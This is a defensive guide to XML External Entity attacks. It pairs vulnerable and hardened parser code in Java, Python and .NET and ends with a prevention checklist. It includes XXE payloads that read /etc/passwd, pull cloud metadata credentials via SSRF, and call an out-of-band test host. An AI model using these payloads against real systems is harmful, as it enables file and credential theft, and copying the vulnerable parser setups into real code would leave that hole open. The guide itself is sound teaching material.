XXE Vulnerability: XML External Entity Attacks and Prevention Guide

XXE Usually Hides in the Parts of the Stack Nobody Revisits

Very few teams ship brand-new features and announce, "we built an XML parser today." XXE usually shows up more indirectly than that. It is sitting inside a SAML library, a SOAP integration that has been running for years, an SVG upload flow, or some document-processing code nobody wants to touch because it only breaks twice a year.

That is why XXE keeps surviving into modern systems even though the bug class is well known. The XML is still there. It is just not where people expect it.

XML External Entity (XXE) attacks happen when an XML parser accepts external entities or Document Type Definitions (DTDs) from untrusted input. That lets attackers turn ordinary XML parsing into:

Local file disclosure
Server-Side Request Forgery (SSRF)
Internal network scanning
Denial of service through entity expansion

Even if your application is "mostly JSON," XXE still appears in SAML integrations, SOAP services, file uploads, office document processing, SVG handling, and third-party SDKs.

XXE Impact	Example
File disclosure	Read `/etc/passwd` or app config files
SSRF	Reach cloud metadata endpoints or internal admin panels
Credential exposure	Read keys, tokens, or connection strings from local files
DoS	Exponential entity expansion consumes CPU and memory

Basic XXE Attack Example

Malicious XML

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
  <name>&xxe;</name>
</user>

If the parser resolves external entities, the application may include local file contents in logs, responses, database records, or error messages.

XXE to SSRF: The Cloud Risk

XXE is not limited to files. External entities can make network requests.

Example Payload

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY meta SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
]>
<data>&meta;</data>

If successful against cloud workloads, this can expose instance metadata or temporary credentials.

Vulnerable Java Example

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(inputStream);

With default or weak configuration, the parser may process attacker-supplied DTDs and external entities.

Hardened Java Configuration

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

DocumentBuilder builder = factory.newDocumentBuilder();
Document doc = builder.parse(inputStream);

Vulnerable Python Example

from lxml import etree

def parse_xml(xml_bytes: bytes):
    return etree.fromstring(xml_bytes)

Hardened Python Example

from defusedxml.lxml import fromstring

def parse_xml(xml_bytes: bytes):
    return fromstring(xml_bytes)

Use hardened parser libraries where available instead of trying to remember every parser flag by hand.

Vulnerable .NET Example

var xml = new XmlDocument();
xml.Load(stream);

Hardened .NET Example

var settings = new XmlReaderSettings {
    DtdProcessing = DtdProcessing.Prohibit,
    XmlResolver = null
};

using var reader = XmlReader.Create(stream, settings);
var xml = new XmlDocument {
    XmlResolver = null
};
xml.Load(reader);

Why XXE Keeps Slipping Through Reviews

1. Developers Assume XML Is Just Data

XML can instruct parsers to fetch external resources. That makes it more dangerous than plain text formats.

2. The XML Is Hidden Inside Other Formats

Common examples:

SVG uploads
SOAP requests
SAML assertions
DOCX, XLSX, and other zipped XML-based formats

3. Secure Defaults Differ Across Libraries

One parser may disable DTDs by default, while another quietly allows them. Teams often copy examples without checking security flags.

How to Test for XXE

File Read Probe

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hosts">]>
<foo>&xxe;</foo>

SSRF Probe

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://collaborator.example/xxe">]>
<foo>&xxe;</foo>

DoS Probe

Use a safe test environment only. Entity expansion payloads can destabilize services quickly.

Best Practices for XXE Prevention

Prefer JSON When Possible

If you control the protocol, JSON removes an entire parser-risk category.

Disable DTDs and External Entities

This is the primary defense for XML parsers.

Use Hardened Libraries

Libraries such as defusedxml exist for a reason. Use them.

Restrict Outbound Network Access

If XXE does occur, network egress controls can limit SSRF impact.

Review Indirect XML Inputs

Do not focus only on explicit .xml endpoints. Look at document imports, SSO flows, and image handling.

XXE Hardening Checklist

Disable DTD processing
Disable external general entities
Disable external parameter entities
Disable external DTD loading
Use hardened XML parser libraries
Prefer JSON for new integrations
Restrict outbound network egress from parser workloads
Add tests for malicious XML samples in CI

Final Takeaway

XXE is not an obscure parser edge case. It is a reminder that input formats can carry behavior, not just structure. The teams that avoid it consistently do two things well: they know exactly where XML still enters the stack, and they lock those code paths down instead of assuming a library default will stay safe forever.